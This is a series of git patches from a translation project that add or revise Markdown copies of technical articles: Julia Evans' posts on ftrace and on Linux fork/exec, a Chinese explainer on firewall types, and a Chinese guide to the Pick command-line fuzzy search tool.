+ struct futex_q *this, *next;
+ union futex_key key = FUTEX_KEY_INIT;
+ int ret;
+ WAKE_Q(wake_q);
+
+ if (!bitset)
+ return -EINVAL;
+
+ ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &key, VERIFY_READ);
+
+```
+
+So the first function called in `futex_wake` really is `get_futex_key`! Neat! Reading the function trace was definitely an easier way to find that out than by reading the kernel code, and it’s nice to see how long all of the functions took.
+
+### How to know what functions you can trace
+
+If you run `sudo trace-cmd list -f` you’ll get a list of all the functions you can trace. That’s pretty simple but it’s important.
+
+### one last thing: events!
+
+So, now we know how to trace functions in the kernel! That’s really cool!
+
+There’s one more class of thing we can trace though! Some events don’t correspond super well to function calls. For example, you might want to know when a program is scheduled on or off the CPU! You might be able to figure that out by peering at function calls, but I sure can’t.
+
+So the kernel also gives you a few events so you can see when a few important things happen. You can see a list of all these events with `sudo cat /sys/kernel/debug/tracing/available_events`
+
+I looked at all the sched_switch events. I’m not exactly sure what sched_switch is but it’s something to do with scheduling I guess.
+
+```
+sudo cat /sys/kernel/debug/tracing/available_events
+sudo trace-cmd record -e sched:sched_switch
+sudo trace-cmd report
+
+```
+
+The output looks like this:
+
+```
+ 16169.624862: Chrome_ChildIOT:24817 [112] S ==> chrome:15144 [120]
+ 16169.624992: chrome:15144 [120] S ==> swapper/3:0 [120]
+ 16169.625202: swapper/3:0 [120] R ==> Chrome_ChildIOT:24817 [112]
+ 16169.625251: Chrome_ChildIOT:24817 [112] R ==> chrome:1561 [112]
+ 16169.625437: chrome:1561 [112] S ==> chrome:15144 [120]
+
+```
+
+so you can see it switching from PID 24817 -> 15144 -> kernel -> 24817 -> 1561 -> 15144. (all of these events are on the same CPU)
+
+### how does ftrace work?
+
+ftrace is a dynamic tracing system. This means that when I start ftracing a kernel function, the **function’s code gets changed**. So – let’s suppose that I’m tracing that `do_page_fault` function from before. The kernel will insert some extra instructions in the assembly for that function to notify the tracing system every time that function gets called. The reason it can add extra instructions is that Linux compiles in a few extra NOP instructions into every function, so there’s space to add tracing code when needed.
+
+This is awesome because it means that when I’m not using ftrace to trace my kernel, it doesn’t affect performance at all. When I do start tracing, the more functions I trace, the more overhead it’ll have.
+
+(probably some of this is wrong, but this is how I think ftrace works anyway)
+
+### use ftrace more easily: brendan gregg’s tools & kernelshark
+
+As we’ve seen in this post, you need to think quite a lot about what individual kernel functions / events do to use ftrace directly. This is cool, but it’s also a lot of work!
+
+Brendan Gregg (our linux debugging tools hero) has a repository of tools that use ftrace to give you information about various things like IO latency. They’re all in his [perf-tools][16] repository on GitHub.
+
+The tradeoff here is that they’re easier to use, but you’re limited to things that Brendan Gregg thought of & decided to make a tool for. Which is a lot of things! :)
+
+Another tool for visualizing the output of ftrace better is [kernelshark][17]. I haven’t played with it much yet but it looks useful. You can install it with `sudo apt-get install kernelshark`.
+
+### a new superpower
+
+I’m really happy I took the time to learn a little more about ftrace today! Like any kernel tool, it’ll work differently between different kernel versions, but I hope that you find it useful one day.
+
+### an index of ftrace articles
+
+Finally, here’s a list of a bunch of ftrace articles I found. Many of them are on LWN (Linux Weekly News), which is a pretty great source of writing on Linux. (you can buy a [subscription][18]!)
+
+* [Debugging the kernel using Ftrace - part 1][1] (Dec 2009, Steven Rostedt)
+
+* [Debugging the kernel using Ftrace - part 2][2] (Dec 2009, Steven Rostedt)
+
+* [Secrets of the Linux function tracer][3] (Jan 2010, Steven Rostedt)
+
+* [trace-cmd: A front-end for Ftrace][4] (Oct 2010, Steven Rostedt)
+
+* [Using KernelShark to analyze the real-time scheduler][5] (2011, Steven Rostedt)
+
+* [Ftrace: The hidden light switch][6] (2014, Brendan Gregg)
+
+* the kernel documentation (which is quite useful): [Documentation/ftrace.txt][7]
+
+* documentation on the events you can trace: [Documentation/events.txt][8]
+
+* some docs on ftrace design for Linux kernel devs (not as useful, but interesting): [Documentation/ftrace-design.txt][9]
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2017/03/19/getting-started-with-ftrace/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://lwn.net/Articles/365835/
+[2]:https://lwn.net/Articles/366796/
+[3]:https://lwn.net/Articles/370423/
+[4]:https://lwn.net/Articles/410200/
+[5]:https://lwn.net/Articles/425583/
+[6]:https://lwn.net/Articles/608497/
+[7]:https://raw.githubusercontent.com/torvalds/linux/v4.4/Documentation/trace/ftrace.txt
+[8]:https://raw.githubusercontent.com/torvalds/linux/v4.4/Documentation/trace/events.txt
+[9]:https://raw.githubusercontent.com/torvalds/linux/v4.4/Documentation/trace/ftrace-design.txt
+[10]:https://lwn.net/Articles/290277/
+[11]:https://lwn.net/Articles/365835/
+[12]:https://lwn.net/Articles/410200/
+[13]:https://gist.githubusercontent.com/jvns/e5c2d640f7ec76ed9ed579be1de3312e/raw/78b8425436dc4bb5bb4fa76a4f85d5809f7d1ef2/trace-cmd-report.txt
+[14]:https://gist.githubusercontent.com/jvns/f32e9b06bcd2f1f30998afdd93e4aaa5/raw/8154d9828bb895fd6c9b0ee062275055b3775101/function_graph.txt
+[15]:https://github.com/torvalds/linux/blob/v4.4/kernel/futex.c#L1313-L1324
+[16]:https://github.com/brendangregg/perf-tools
+[17]:https://lwn.net/Articles/425583/
+[18]:https://lwn.net/subscribe/Info
From 254007f19b4f1d510dfa9f621c6879f7af79aefe Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:47:49 +0800
Subject: [PATCH 308/371] =?UTF-8?q?20180113-8=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ppens when you start a process on Linux.md | 154 ++++++++++++++++++
1 file changed, 154 insertions(+)
create mode 100644 sources/tech/20161004 What happens when you start a process on Linux.md
diff --git a/sources/tech/20161004 What happens when you start a process on Linux.md b/sources/tech/20161004 What happens when you start a process on Linux.md
new file mode 100644
index 0000000000..41cc9424ea
--- /dev/null
+++ b/sources/tech/20161004 What happens when you start a process on Linux.md
@@ -0,0 +1,154 @@
+What happens when you start a process on Linux?
+===========================================================
+
+
+This is about how fork and exec work on Unix. You might already know about this, but some people don’t, and I was surprised when I learned it a few years back!
+
+So. You want to start a process. We’ve talked a lot about **system calls** on this blog – every time you start a process, or open a file, that’s a system call. So you might think that there’s a system call like this
+
+```
+start_process(["ls", "-l", "my_cool_directory"])
+
+```
+
+This is a reasonable thing to think and apparently it’s how it works in DOS/Windows. I was going to say that this _isn’t_ how it works on Linux. But! I went and looked at the docs and apparently there is a [posix_spawn][2] system call that does basically this. Shows what I know. Anyway, we’re not going to talk about that.
+
+### fork and exec
+
+On Linux, `posix_spawn` is implemented behind the scenes in terms of 2 system calls called `fork` and `exec` (actually `execve`), which are what people usually use directly anyway. On OS X apparently people use `posix_spawn` and fork/exec are discouraged! But we’ll talk about Linux.
+
+Every process in Linux lives in a “process tree”. You can see that tree by running `pstree`. The root of the tree is `init`, with PID 1. Every process (except init) has a parent, and a process can have many children.
+
+So, let’s say I want to start a process called `ls` to list a directory. Do I just have a baby `ls`? No!
+
+Instead, what I do is have a child that is a clone of myself, and then that child gets its brain eaten and turns into `ls`. Really.
+
+We start out like this:
+
+```
+my parent
+ |- me
+
+```
+
+Then I run `fork()`. I have a child which is a clone of myself.
+
+```
+my parent
+ |- me
+ |-- clone of me
+
+```
+
+Then I organize it so that my child runs `exec("ls")`. That leaves us with
+
+```
+my parent
+ |- me
+ |-- ls
+
+```
+
+and once ls exits, I’ll be all by myself again. Almost:
+
+```
+my parent
+ |- me
+ |-- ls (zombie)
+
+```
+
+At this point ls is actually a zombie process! That means it’s dead, but it’s waiting around for me in case I want to check on its return value (using the `wait` system call). Once I get its return value, I will really be all alone again.
+
+```
+my parent
+ |- me
+
+```
+
+### what fork and exec looks like in code
+
+This is one of the exercises you have to do if you’re going to write a shell (which is a very fun and instructive project! Kamal has a great workshop on GitHub about how to do it: [https://github.com/kamalmarhubi/shell-workshop][3])
+
+It turns out that with a bit of work and some C or Python skills you can write a very simple shell (like bash!) in just a few hours (at least if you have someone sitting next to you who knows what they’re doing, longer if not :)). I’ve done this and it was awesome.
+
+Anyway, here’s what fork and exec look like in a program. I’ve written fake C pseudocode. Remember that [fork can fail!][4]
+
+```
+int pid = fork();
+// now i am split in two! augh!
+// who am I? I could be either the child or the parent
+if (pid == 0) {
+ // ok I am the child process
+ // ls will eat my brain and I'll be a totally different process
+ exec(["ls"])
+} else if (pid == -1) {
+ // omg fork failed this is a disaster
+} else {
+ // ok i am the parent
+ // continue my business being a cool program
+ // I could wait for the child to finish if I want
+}
+
+```
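+
+If you want something you can actually compile and run, here’s a fleshed-out version of that pseudocode (my own sketch, not from the original post). It uses `execlp`, one member of the `exec` family, and `waitpid` so the parent reaps the child instead of leaving a zombie around:
+
+```
+#include <stdio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+int main(void) {
+    pid_t pid = fork();
+
+    if (pid == -1) {
+        // fork failed: no child was created
+        perror("fork");
+        return 1;
+    }
+
+    if (pid == 0) {
+        // child: exec replaces this process's memory with ls
+        execlp("ls", "ls", "-l", (char *)NULL);
+        // we only get here if exec failed
+        perror("execlp");
+        _exit(127);
+    }
+
+    // parent: collect the child's exit status (this is what reaps the zombie)
+    int status;
+    waitpid(pid, &status, 0);
+    if (WIFEXITED(status)) {
+        printf("child exited with status %d\n", WEXITSTATUS(status));
+    }
+    return 0;
+}
+
+```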
+
+### ok what does it mean for your brain to be eaten julia
+
+Processes have a lot of attributes!
+
+You have
+
+* open files (including open network connections)
+
+* environment variables
+
+* signal handlers (what happens when you run Ctrl+C on the program?)
+
+* a bunch of memory (your “address space”)
+
+* registers
+
+* an “executable” that you ran (/proc/$pid/exe)
+
+* cgroups and namespaces (“linux container stuff”)
+
+* a current working directory
+
+* the user your program is running as
+
+* some other stuff that I’m forgetting
+
+When you run `execve` and have another program eat your brain, actually almost everything stays the same! You have the same environment variables and signal handlers and open files and more.
+
+The only thing that changes is, well, all of your memory and registers and the program that you’re running. Which is a pretty big deal.
+
+### why is fork not super expensive (or: copy on write)
+
+You might ask “julia, what if I have a process that’s using 2GB of memory! Does that mean every time I start a subprocess all that 2GB of memory gets copied?! That sounds expensive!”
+
+It turns out that Linux implements “copy on write” for fork() calls, so that for all the 2GB of memory in the new process it’s just like “look at the old process! it’s the same!”. Then, if either process writes to any of that memory, only the pages that get written to are actually copied at that point. As long as the memory stays the same in both processes, there’s no need to copy anything!
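+
+Copy-on-write itself is invisible to your program, so you can’t really see it from code; here’s a tiny sketch (mine, not from the post) of the behaviour it preserves: after `fork()`, the child sees the same data, and a write in the child only causes the written pages to be copied, so the parent never notices.
+
+```
+#include <stdio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+int main(void) {
+    int x = 42;
+    pid_t pid = fork();
+    if (pid == -1) {
+        perror("fork");
+        return 1;
+    }
+    if (pid == 0) {
+        // child: this write makes the kernel copy the page holding x,
+        // so the parent's copy is untouched
+        x = 1000;
+        printf("child sees x = %d\n", x);
+        _exit(0);
+    }
+    waitpid(pid, NULL, 0);
+    printf("parent still sees x = %d\n", x);  // prints 42
+    return 0;
+}
+
+```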
+
+### why you might care about all this
+
+Okay, julia, this is cool trivia, but why does it matter? Do the details about which signal handlers or environment variables get inherited or whatever actually make a difference in my day-to-day programming?
+
+Well, maybe! For example, there’s this [delightful bug on Kamal’s blog][5]. It talks about how Python sets the signal handler for SIGPIPE to ignore. So if you run a program from inside Python, by default it will ignore SIGPIPE! This means that the program will **behave differently** depending on whether you started it from a Python script or from your shell! And in this case it was causing a weird bug!
+
+So, your program’s environment (environment variables, signal handlers, open files, etc.) can matter! Your program inherits all of that from its parent process, whatever that was! This can sometimes be a useful thing to know when debugging.
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2016/10/04/exec-will-eat-your-brain/
+
+作者:[ Julia Evans][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://jvns.ca/categories/favorite
+[2]:http://man7.org/linux/man-pages/man3/posix_spawn.3.html
+[3]:https://github.com/kamalmarhubi/shell-workshop
+[4]:https://rachelbythebay.com/w/2014/08/19/fork/
+[5]:http://kamalmarhubi.com/blog/2015/06/30/my-favourite-bug-so-far-at-the-recurse-center/
From 5c8184bf195212f3c250d7957fc076691f1200c7 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 22:10:50 +0800
Subject: [PATCH 309/371] Update 20161004 What happens when you start a process
on Linux.md
---
.../20161004 What happens when you start a process on Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20161004 What happens when you start a process on Linux.md b/sources/tech/20161004 What happens when you start a process on Linux.md
index 41cc9424ea..0cd1247c9b 100644
--- a/sources/tech/20161004 What happens when you start a process on Linux.md
+++ b/sources/tech/20161004 What happens when you start a process on Linux.md
@@ -1,3 +1,5 @@
+Translating by jessie-pang
+
What happens when you start a process on Linux?
===========================================================
From eec3b4d8cfb42fbf14a768811987848721d7eea5 Mon Sep 17 00:00:00 2001
From: Chenguang
Date: Sat, 13 Jan 2018 22:22:48 +0800
Subject: [PATCH 310/371] Update 20150615 Let-s Build A Simple Interpreter.
Part 1..md
Translating Let-s build a simple interpreter Part1.md
---
.../tech/20150615 Let-s Build A Simple Interpreter. Part 1..md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md b/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
index 4c0d541a5a..9a815f2852 100644
--- a/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
+++ b/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
@@ -1,3 +1,4 @@
+// Translating by Linchenguang....
Let’s Build A Simple Interpreter. Part 1.
======
From 5d58d05ab6864f908de5d4f32dbfc4e4240fdcd3 Mon Sep 17 00:00:00 2001
From: Torival
Date: Sat, 13 Jan 2018 22:56:05 +0800
Subject: [PATCH 311/371] Update 20140210 Three steps to learning GDB.md
---
sources/tech/20140210 Three steps to learning GDB.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20140210 Three steps to learning GDB.md b/sources/tech/20140210 Three steps to learning GDB.md
index 94279a2374..3e94e3d77f 100644
--- a/sources/tech/20140210 Three steps to learning GDB.md
+++ b/sources/tech/20140210 Three steps to learning GDB.md
@@ -1,4 +1,4 @@
-Three steps to learning GDB
+Translating by Torival Three steps to learning GDB
============================================================
Debugging C programs used to scare me a lot. Then I was writing my [operating system][2] and I had so many bugs to debug! I was extremely fortunate to be using the emulator qemu, which lets me attach a debugger to my operating system. The debugger is called `gdb`.
From 5f643da6f3ed5a75670ac5af0a471aaaaadc7e02 Mon Sep 17 00:00:00 2001
From: Torival
Date: Sat, 13 Jan 2018 22:57:21 +0800
Subject: [PATCH 312/371] Update 20180111 BASH drivers, start your engines.md
---
sources/tech/20180111 BASH drivers, start your engines.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20180111 BASH drivers, start your engines.md b/sources/tech/20180111 BASH drivers, start your engines.md
index 7126bea3e0..e5f8631e39 100644
--- a/sources/tech/20180111 BASH drivers, start your engines.md
+++ b/sources/tech/20180111 BASH drivers, start your engines.md
@@ -1,4 +1,4 @@
-BASH drivers, start your engines
+Translating by Torival BASH drivers, start your engines
======
![](http://www.thelinuxrain.com/content/01-articles/201-bash-drivers-start-your-engines/headimage.jpg)
From fbf3e9ef336e12016ef2d92b8bf4f7d5435f04a3 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 01:14:16 +0800
Subject: [PATCH 313/371] PRF:20171011 What is a firewall.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@zjon 翻译的不错。原文有些问题,我适当调整了。
---
.../tech/20171011 What is a firewall.md | 51 ++++++++++---------
1 file changed, 27 insertions(+), 24 deletions(-)
diff --git a/translated/tech/20171011 What is a firewall.md b/translated/tech/20171011 What is a firewall.md
index cdbf18a5c9..d854340ab6 100644
--- a/translated/tech/20171011 What is a firewall.md
+++ b/translated/tech/20171011 What is a firewall.md
@@ -1,66 +1,69 @@
什么是防火墙?
=====
+
+> 流行的防火墙是多数组织主要的边界防御。
+
+![](https://images.techhive.com/images/article/2017/04/firewall-100716789-large.jpg)
+
基于网络的防火墙已经在美国企业无处不在,因为它们证实了抵御日益增长的威胁的防御能力。
-通过网络测试公司 NSS 实验室最近的一项研究发现高达 80% 的美国大型企业运行着下一代防火墙。研究公司 IDC 评估防火墙和相关的统一威胁管理市场营业额在 2015 是 76 亿美元,预计到 2020 年底将达到 127 亿美元。
+通过网络测试公司 NSS 实验室最近的一项研究发现,高达 80% 的美国大型企业运行着下一代防火墙。研究公司 IDC 评估防火墙和相关的统一威胁管理市场的营业额在 2015 是 76 亿美元,预计到 2020 年底将达到 127 亿美元。
-**如果你想提升,这里是[What to consider when deploying a next generation firewall][1]**
+**如果你想升级,这里是《[当部署下一代防火墙时要考虑什么》][1]**
### 什么是防火墙?
-防火墙充当一个监控流量的边界防御工具,要么允许它要么屏蔽它。 多年来,防火墙的功能不断增强,现在大多数防火墙不仅可以阻止已知的一组威胁,并执行高级访问控制列表策略,还可以深入检查各个包的流量和测试包,以确定它们是否安全。大多数防火墙被部署为网络硬件,用于处理流量和允许终端用户配置和管理系统的软件。越来越多的软件版防火墙部署到高度虚拟机环境中执行策略在被隔离的网络或 IaaS 公有云中。
+防火墙作为一个边界防御工具,其监控流量——要么允许它、要么屏蔽它。 多年来,防火墙的功能不断增强,现在大多数防火墙不仅可以阻止已知的一些威胁、执行高级访问控制列表策略,还可以深入检查流量中的每个数据包,并测试包以确定它们是否安全。大多数防火墙都部署为用于处理流量的网络硬件,和允许终端用户配置和管理系统的软件。越来越多的软件版防火墙部署到高度虚拟化的环境中,以在被隔离的网络或 IaaS 公有云中执行策略。
-随着防火墙技术的进步在过去十年中创造了新的防火墙部署选项,所以现在对于部署防火墙的最终用户来说,有一些选择。这些选择包括:
+随着防火墙技术的进步,在过去十年中创造了新的防火墙部署选择,所以现在对于部署防火墙的最终用户来说,有了更多选择。这些选择包括:
### 有状态的防火墙
- 当首次创造防火墙时,它们是无状态的,这意味着流量通过硬件,在检查被监视的每个网络包流量的过程中,并单独屏蔽或允许它。从1990年代中后期开始,防火墙的第一个主要进展是引入状态。有状态防火墙在更全面的上下文中检查流量,同时考虑到网络连接的工作状态和特性,以提供更全面的防火墙。例如,维持这状态的防火墙允许某些流量访问某些用户,同时阻塞其他用户的同一流量。
-### 下一代防火墙
- 多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测以及对加密流量的预防和检查。下一代防火墙(NGFWs)是指有许多先进的功能集成到防火墙的防火墙。
+当防火墙首次创造出来时,它们是无状态的,这意味着流量所通过的硬件当单独地检查被监视的每个网络流量包时,屏蔽或允许是隔离的。从 1990 年代中后期开始,防火墙的第一个主要进展是引入了状态。有状态防火墙在更全面的上下文中检查流量,同时考虑到网络连接的工作状态和特性,以提供更全面的防火墙。例如,维持这个状态的防火墙可以允许某些流量访问某些用户,同时对其他用户阻塞同一流量。
### 基于代理的防火墙
这些防火墙充当请求数据的最终用户和数据源之间的网关。在传递给最终用户之前,所有的流量都通过这个代理过滤。这通过掩饰信息的原始请求者的身份来保护客户端不受威胁。
-### Web 应用防火墙
+### Web 应用防火墙(WAF)
-这些防火墙位于特定应用程序的前面,而不是在更广阔的网络的入口或则出口上。而基于代理的防火墙通常被认为是保护终端客户,WAFs 通常被认为是保护应用服务器。
+这些防火墙位于特定应用的前面,而不是在更广阔的网络的入口或者出口上。基于代理的防火墙通常被认为是保护终端客户的,而 WAF 则被认为是保护应用服务器的。
### 防火墙硬件
-防火墙硬件通常是一个简单的服务器,它可以充当路由器来过滤流量和运行防火墙软件。这些设备放置在企业网络的边缘,路由器和 Internet 服务提供商的连接点之间。通常企业可能在整个数据中心部署十几个物理防火墙。 用户需要根据用户基数的大小和 Internet 连接的速率来确定防火墙需要支持的吞吐量容量。
+防火墙硬件通常是一个简单的服务器,它可以充当路由器来过滤流量和运行防火墙软件。这些设备放置在企业网络的边缘,位于路由器和 Internet 服务提供商(ISP)的连接点之间。通常企业可能在整个数据中心部署十几个物理防火墙。 用户需要根据用户基数的大小和 Internet 连接的速率来确定防火墙需要支持的吞吐量容量。
### 防火墙软件
-通常,终端用户部署多个防火墙硬件端和一个中央防火墙软件系统来管理部署。 这个中心系统是配置策略和特性的地方,在那里可以进行分析,并可以对威胁作出响应。
+通常,终端用户部署多个防火墙硬件端和一个中央防火墙软件系统来管理该部署。 这个中心系统是配置策略和特性的地方,在那里可以进行分析,并可以对威胁作出响应。
-### 下一代防火墙
+### 下一代防火墙(NGFW)
-多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测以及对加密流量的预防和检查。下一代防火墙(NGFWs)是指集成了这些先进功能的防火墙,这里描述的是它们中的一些。
+多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测和防御以及对加密流量的检查。下一代防火墙(NGFW)是指集成了许多先进的功能的防火墙。
-### 有状态的检测
+#### 有状态的检测
阻止已知不需要的流量,这是基本的防火墙功能。
-### 抵御病毒
+#### 反病毒
在网络流量中搜索已知病毒和漏洞,这个功能有助于防火墙接收最新威胁的更新,并不断更新以保护它们。
-### 入侵防御系统
+#### 入侵防御系统(IPS)
-这类安全产品可以部署为一个独立的产品,但 IPS 功能正逐步融入 NGFWs。 虽然基本的防火墙技术识别和阻止某些类型的网络流量,但 IPS 使用更多的细粒度安全措施,如签名跟踪和异常检测,以防止不必要的威胁进入公司网络。 IPS 系统已经取代了以前这一技术的版本,入侵检测系统(IDS)的重点是识别威胁而不是遏制它们。
+这类安全产品可以部署为一个独立的产品,但 IPS 功能正逐步融入 NGFW。 虽然基本的防火墙技术可以识别和阻止某些类型的网络流量,但 IPS 使用更细粒度的安全措施,如签名跟踪和异常检测,以防止不必要的威胁进入公司网络。 这一技术的以前版本是入侵检测系统(IDS),其重点是识别威胁而不是遏制它们,已经被 IPS 系统取代了。
-### 深度包检测(DPI)
+#### 深度包检测(DPI)
-DPI 可部分或用于与 IPS 的结合,但其仍然成为一个 NGFWs 的重要特征,因为它提供细粒度分析的能力,具体到流量包和流量数据的头文件。DPI 还可以用来监测出站流量,以确保敏感信息不会离开公司网络,这种技术称为数据丢失预防(DLP)。
+DPI 可作为 IPS 的一部分或与其结合使用,但其仍然成为一个 NGFW 的重要特征,因为它提供细粒度分析流量的能力,可以具体到流量包头和流量数据。DPI 还可以用来监测出站流量,以确保敏感信息不会离开公司网络,这种技术称为数据丢失防御(DLP)。
-### SSL 检测
+#### SSL 检测
-安全套接字层(SSL)检测是一个检测加密流量来测试威胁的方法。随着越来越多的流量进行加密,SSL 检测成为 DPI 技术,NGFWs 正在实施的一个重要组成部分。SSL 检测作为一个缓冲区,它在送到最终目的地之前解码流量以检测它。
+安全套接字层(SSL)检测是一个检测加密流量来测试威胁的方法。随着越来越多的流量进行加密,SSL 检测成为 NGFW 正在实施的 DPI 技术的一个重要组成部分。SSL 检测作为一个缓冲区,它在送到最终目的地之前解码流量以检测它。
-### 沙盒
+#### 沙盒
-这个是被卷入 NGFWs 中的一个较新的特性,它指防火墙接收某些未知的流量或者代码,并在一个测试环境运行,以确定它是否是邪恶的能力。
+这个是被卷入 NGFW 中的一个较新的特性,它指防火墙接收某些未知的流量或者代码,并在一个测试环境运行,以确定它是否存在问题的能力。
--------------------------------------------------------------------------------
@@ -68,7 +71,7 @@ via: https://www.networkworld.com/article/3230457/lan-wan/what-is-a-firewall-per
作者:[Brandon Butler][a]
译者:[zjon](https://github.com/zjon)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From b292e4095abb513c56ada3c92ab42634e02d036f Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 01:14:56 +0800
Subject: [PATCH 314/371] PUB:20171011 What is a firewall.md
@zjon https://linux.cn/article-9233-1.html
---
{translated/tech => published}/20171011 What is a firewall.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171011 What is a firewall.md (100%)
diff --git a/translated/tech/20171011 What is a firewall.md b/published/20171011 What is a firewall.md
similarity index 100%
rename from translated/tech/20171011 What is a firewall.md
rename to published/20171011 What is a firewall.md
From f99d0f86eac06813976fa4bc28f5b546bb5d8f29 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 10:07:29 +0800
Subject: [PATCH 315/371] PRF:20170925 A Commandline Fuzzy Search Tool For
Linux.md
@lujun9972
---
...Commandline Fuzzy Search Tool For Linux.md | 76 +++++++++++--------
1 file changed, 43 insertions(+), 33 deletions(-)
diff --git a/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
index 9d16aaf1aa..d76309f820 100644
--- a/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
+++ b/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
@@ -1,34 +1,38 @@
-Pick - 一款 Linux 上的命令行模糊搜索工具
+Pick:一款 Linux 上的命令行模糊搜索工具
======
-![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
-今天,我们要讲的是一款有趣的命令行工具,名叫 `Pick`。它允许用户通过 ncurses(3X) 界面来从一系列选项中进行选择,而且还支持模糊搜索的功能。当你想要选择某个名字中包含非英文字符的目录或文件时,这款工具就很有用了。你根本都无需学习如何输入非英文字符。借助 Pick,你可以很方便地进行搜索,选择,然后浏览该文件或进入该目录。你甚至无需输入任何字符来过滤文件/目录。这很适合那些有大量目录和文件的人来用。
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/search-720x340.jpg)
-### Pick - 一款 Linux 上的命令行模糊搜索工具
+今天,我们要讲的是一款有趣的命令行工具,名叫 Pick。它允许用户通过 ncurses(3X) 界面来从一系列选项中进行选择,而且还支持模糊搜索的功能。当你想要选择某个名字中包含非英文字符的目录或文件时,这款工具就很有用了。你根本都无需学习如何输入非英文字符。借助 Pick,你可以很方便地进行搜索、选择,然后浏览该文件或进入该目录。你甚至无需输入任何字符来过滤文件/目录。这很适合那些有大量目录和文件的人来用。
-#### 安装 Pick
+### 安装 Pick
+
+对 Arch Linux 及其衍生品来说,Pick 放在 [AUR][1] 中。因此 Arch 用户可以使用类似 [Pacaur][2],[Packer][3],以及 [Yaourt][4] 等 AUR 辅助工具来安装它。
-对 **Arch Linux** 及其衍生品来说,pick 放在 [**AUR**][1] 中。因此 Arch 用户可以使用类似 [**Pacaur**][2],[**Packer**][3],以及 [**Yaourt**][4] 等 AUR 辅助工具来安装它。
```
pacaur -S pick
```
或者,
+
```
packer -S pick
```
或者,
+
```
yaourt -S pick
```
-**Debian**,**Ubuntu**,**Linux Mint** 用户则可以通过运行下面命令来安装 Pick。
+Debian,Ubuntu,Linux Mint 用户则可以通过运行下面命令来安装 Pick。
+
```
sudo apt-get install pick
```
-其他的发行版则可以从[**这里 **][5] 下载最新的安装包,然后按照下面的步骤来安装。在写本指南时,其最新版为 1.9.0。
+其他的发行版则可以从[这里][5]下载最新的安装包,然后按照下面的步骤来安装。在写本指南时,其最新版为 1.9.0。
+
```
wget https://github.com/calleerlandsson/pick/releases/download/v1.9.0/pick-1.9.0.tar.gz
tar -zxvf pick-1.9.0.tar.gz
@@ -36,81 +40,87 @@ cd pick-1.9.0/
```
使用下面命令进行配置:
+
```
./configure
```
-最后,构建并安装 pick:
+最后,构建并安装 Pick:
+
```
make
sudo make install
```
-#### 用法
+### 用法
通过将它与其他命令集成能够大幅简化你的工作。我这里会给出一些例子,让你理解它是怎么工作的。
让们先创建一堆目录。
+
```
mkdir -p abcd/efgh/ijkl/mnop/qrst/uvwx/yz/
```
-现在,你想进入目录 `/ijkl/`。你有两种选择。可以使用 **cd** 命令:
+现在,你想进入目录 `/ijkl/`。你有两种选择。可以使用 `cd` 命令:
+
```
cd abcd/efgh/ijkl/
```
-或者,创建一个[**快捷方式 **][6] 或者说别名指向这个目录,这样你可以迅速进入该目录。
+或者,创建一个[快捷方式][6] 或者说别名指向这个目录,这样你可以迅速进入该目录。
+
+但,使用 `pick` 命令则问题变得简单的多。看下面这个例子。
-但,使用 "pick" 命令则问题变得简单的多。看下面这个例子。
```
cd $(find . -type d | pick)
```
这个命令会列出当前工作目录下的所有目录及其子目录,你可以用上下箭头选择你想进入的目录,然后按下回车就行了。
-**像这样:**
+像这样:
-[![][7]][8]
+![][8]
而且,它还会根据你输入的内容过滤目录和文件。比如,当我输入 “or” 时会显示如下结果。
-[![][7]][9]
+![][9]
-这只是一个例子。你也可以将 “pick” 命令跟其他命令一起混用。
+这只是一个例子。你也可以将 `pick` 命令跟其他命令一起混用。
这是另一个例子。
+
```
find -type f | pick | xargs less
```
-该命令让你选择当前目录中的某个文件并用 less 来查看它。
+该命令让你选择当前目录中的某个文件并用 `less` 来查看它。
-[![][7]][10]
+![][10]
+
